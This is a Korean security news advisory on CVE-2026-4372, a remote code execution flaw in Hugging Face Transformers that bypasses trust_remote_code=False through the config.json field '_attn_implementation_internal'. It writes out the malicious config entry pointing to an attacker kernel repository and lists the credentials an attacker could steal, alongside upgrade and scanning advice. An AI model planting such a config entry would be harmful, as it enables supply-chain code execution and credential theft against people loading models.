Pluto Security 연구팀이 Hugging Face Transformers 라이브러리(4.56.0~5.2.x)에서 원격 코드 실행 취약점 CVE-2026-4372를 발견했다. 공격자는 모델의 config.json에 단 하나의 무해해 보이는 파라미터를 추가하는 것만으로 trust_remote_code=False 플래그를 우회하고 공격자 제어 코드를 실행할 수 있다. 22억 건 누적 인스톨에 달하는 이 라이브러리는 현재도 취약 버전이 매주 700~800만 회 다운로드되고 있다.

22억 인스톨의 라이브러리에서 발견된 치명적 버그

Hugging Face Transformers는 전 세계 ML 개발자와 기업이 100만 개 이상의 모델 변형을 로드하고 미세조정하는 데 사용하는 핵심 파이썬 라이브러리다. PyPI에서 매월 1억 4,600만 번 이상 다운로드되며, GitHub 스타 16만 1,000개를 보유한 오픈소스 AI 인프라의 중심이다.

CVE-2026-4372는 2026년 3월 3일 배포된 Transformers 5.3.0에서 조용히 패치됐지만, 2025년 8월부터 적용된 4.56.0 이후 모든 버전에 영향을 미친다. 취약 버전은 여전히 매주 700~800만 건 다운로드되며 전체 주간 인스톨의 약 4분의 1을 차지한다.

지표 수치
누적 인스톨 수 22억 건 이상
월간 다운로드 1억 4,600만 회
취약 버전 주간 다운로드 700~800만 회
영향받는 버전 범위 4.56.0 ~ 5.2.x
패치 버전 5.3.0 (2026년 3월 3일)
취약점 CVSS 심각도 High
공개된 CVE 번호 CVE-2026-4372

공격 원리: 세 가지 독립 취약점의 결합

이 취약점은 코드베이스의 세 가지 독립적인 설계 결정이 결합되면서 발생한다.

1단계: 모델 로딩 시 자동 config 실행

AutoModelForCausalLM.from_pretrained("model-name")을 호출하면 라이브러리는 Hugging Face Hub에서 모델의 config, 가중치, 토크나이저를 자동으로 내려받아 조립한다. 이 과정에서 config.json의 모든 파라미터가 setattr로 모델 객체에 필터링 없이 적용된다.

2단계: _attn_implementation_internal 파라미터 미보호

이 내부 파라미터는 모델이 사용하는 어텐션 메커니즘(Flash Attention, SDPA, 기본 eager)을 제어한다. 문제는 이 내부 파라미터가 외부 입력으로부터 전혀 보호되지 않는다는 점이다.

3단계: Hub Kernels 로더의 비샌드박싱 실행

hub_kernels.py_attn_implementation_internal의 값이 소유자/레포지토리 패턴과 일치하면 해당 커널을 Kernels Hub에서 다운로드하고 샌드박싱 없이 즉시 실행한다.

공격 시나리오:
1. 공격자가 악성 커널을 자신의 Hugging Face 레포에 업로드
2. 모델 config.json에 다음 추가:
   "_attn_implementation_internal": "attacker-org/malicious-kernel"
3. 피해자가 모델을 로드하면 자동으로 악성 코드 실행

즉각 조치 사항: 1) pip install --upgrade transformers>=5.3.0으로 즉시 업그레이드, 2) 캐시된 모델의 모든 config.json에서 _attn_implementation_internal 필드 검색, 3) 클라우드 자격증명·SSH 키·API 토큰 로테이션 권장.

GPU 가속 환경이 최우선 표적

이 취약점의 핵심 아이러니는 가장 가치 있는 표적이 가장 취약하다는 점이다. kernels 패키지는 선택적 의존성이지만, GPU 가속 추론을 원하는 사용자라면 대부분 설치한다. 기업 ML 플랫폼과 GPU 클러스터는 하드웨어 활용 극대화를 위해 모든 선택적 의존성을 설치하는 것이 일반적이다.

연구팀의 말을 빌리면 "GPU 가속 추론으로 작업하는 사용자 — 가장 가치 있는 공격 대상 — 가 이 취약점에 가장 취약하다."

공격자가 탈취 가능한 것들

탈취 가능 자산 예시
클라우드 자격증명 AWS, GCP, Azure 키
AI/ML API 키 OpenAI, Anthropic, HuggingFace 토큰
CI/CD 파이프라인 GitHub Actions 시크릿
인프라 접근 SSH 키, Kubernetes 설정, Vault 토큰

배경 맥락: 이 취약점이 공개되기 한 달 전, Hugging Face에서 OpenAI Privacy Filter 모델로 위장한 악성 레포지토리가 18시간 만에 트렌딩 1위에 오르며 24만 4,000번 다운로드된 사건이 있었다. AI 공급망 공격이 단순한 이론적 위협이 아님을 보여주는 사례다.

방어 권고사항

Pluto Security 연구팀과 Hugging Face는 다음을 권고한다:

  1. 즉시 Transformers 5.3.0으로 업그레이드 — 패치가 이미 배포돼 있다
  2. 캐시 검사 — 로컬에 캐시된 모든 config.json에서 _attn_implementation_internal 필드 검색
  3. 모델 로딩 샌드박싱 — 모델 로딩을 격리된 컨테이너에서 실행하고 호스트 자격증명·네트워크 접근 차단
  4. 설정 파일 스캔 — 밑줄로 시작하는 예상치 못한 필드를 포함한 config를 로드 전 검사

핵심 요약

  • CVE-2026-4372: HuggingFace Transformers 4.56.0~5.2.x의 RCE 취약점, 패치 버전은 5.3.0
  • 세 가지 독립 취약점의 결합 — config.json 한 줄로 trust_remote_code=False 우회 가능
  • GPU 가속 추론 환경(기업 ML 플랫폼, GPU 클러스터)이 최우선 공격 대상
  • 취약 버전 여전히 주당 700~800만 회 다운로드 중
  • 즉시 업그레이드 + 캐시 검사 + 자격증명 로테이션 권고

AI 공급망 공격이 패키지 레지스트리에서 모델 레포지토리로 전선을 확장하고 있다. CVE-2026-4372는 ML 인프라 보안이 더 이상 옵션이 아니라 필수임을 다시 한번 상기시켜 준다. 지금 당장 업그레이드하라.